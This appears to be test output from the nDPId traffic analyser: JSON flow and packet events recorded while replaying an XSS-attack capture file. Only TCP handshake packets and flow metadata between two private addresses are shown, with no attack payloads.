+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":2,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6gK6r2Hi3qcQ+aAScSA8AAAAAgQFtAQCCAoD5XzZATurZAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":3,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u51AAD4GCjusEAABwKgKMuoCAFDepxD5uq9h44AQAOXbBwAAAQEICgE7q2QD5XzZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347693386,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347693386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yJFAAD4G\/T6sEAABwKgKMuoQAFBhE2QOAAAAAKACchABpwAAAgQFtAQCCAoBO6yfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":2,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6hDs1hgmYRNkD6AScSB7jwAAAgQFtAQCCAoD5X4UATusnwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":3,"flow_last_seen":1499347693387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347693387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yJJAAD4G\/UWsEAABwKgKMuoQAFBhE2QP7NYYJ4AQAOUalwAAAQEICgE7rJ8D5X4U"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347694661,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347694661,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mmhAAD4GK2isEAABwKgKMuoeAFATaje1AAAAAKACchB6XQAAAgQFtAQCCAoBO63dAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":2,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6h4IeSXoE2o3tqAScSDJowAAAgQFtAQCCAoD5X9SATut3QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":3,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mmlAAD4GK2+sEAABwKgKMuoeAFATaje2CHkl6YAQAOVoqgAAAQEICgE7rd4D5X9S"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347697189,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347697189,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88ppAAD4G0zWsEAABwKgKMuo4AFBV\/kLMAAAAAKACchAqHwAAAgQFtAQCCAoBO7BWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":2,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6jj3l3auVf5CzaAScSA3CAAAAgQFtAQCCAoD5YHKATuwVgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":3,"flow_last_seen":1499347697190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347697190,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08ptAAD4G0zysEAABwKgKMuo4AFBV\/kLN95d2r4AQAOXWDwAAAQEICgE7sFYD5YHK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347698449,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iq9AAD4GOyGsEAABwKgKMupGAFDXwDs\/AAAAAKACchCuoQAAAgQFtAQCCAoBO7GQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":2,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6kYJky3T18A7QKAScSDxLwAAAgQFtAQCCAoD5YMFATuxkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":3,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0irBAAD4GOyisEAABwKgKMupGAFDXwDtACZMt1IAQAOWQNgAAAQEICgE7sZED5YMF"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347699724,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347699724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2NAAD4Gcm2sEAABwKgKMupUAFDv6uGsAAAAAKACchDuvAAAAgQFtAQCCAoBO7LPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":2,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6lS1E1w77+rhraAScSBWIwAAAgQFtAQCCAoD5YREATuyzwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":3,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2RAAD4GcnSsEAABwKgKMupUAFDv6uGttRNcPIAQAOX1KgAAAQEICgE7ss8D5YRE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347702287,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347702287,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dHpAAD4GUVasEAABwKgKMupuAFBhicEqAAAAAKACchCbBQAAAgQFtAQCCAoBO7VQAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6m4\/xiwDYYnBK6AScSClcAAAAgQFtAQCCAoD5YbFATu1UAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":3,"flow_last_seen":1499347702288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347702288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dHtAAD4GUV2sEAABwKgKMupuAFBhicErP8YsBIAQAOVEeAAAAQEICgE7tVAD5YbF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347703726,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347703726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80EJAAD4G9Y2sEAABwKgKMup8AFAHaGb6AAAAAKACchBN4QAAAgQFtAQCCAoBO7a4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":2,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6nwCGRKtB2hm+6AScSCt5wAAAgQFtAQCCAoD5YgtATu2uAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":3,"flow_last_seen":1499347703727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347703727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00ENAAD4G9ZSsEAABwKgKMup8AFAHaGb7AhkSroAQAOVM7wAAAQEICgE7trgD5Ygt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347705116,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347705116,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oq5AAD4GIyKsEAABwKgKMuqKAFDjSRq9AAAAAKACchC80wAAAgQFtAQCCAoBO7gTAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":2,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6oqWCrpo40kavqAScSDf0QAAAgQFtAQCCAoD5YmIATu4EwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6174,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":3,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oq9AAD4GIymsEAABwKgKMuqKAFDjSRq+lgq6aYAQAOV+2QAAAQEICgE7uBMD5YmI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347706399,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347706399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 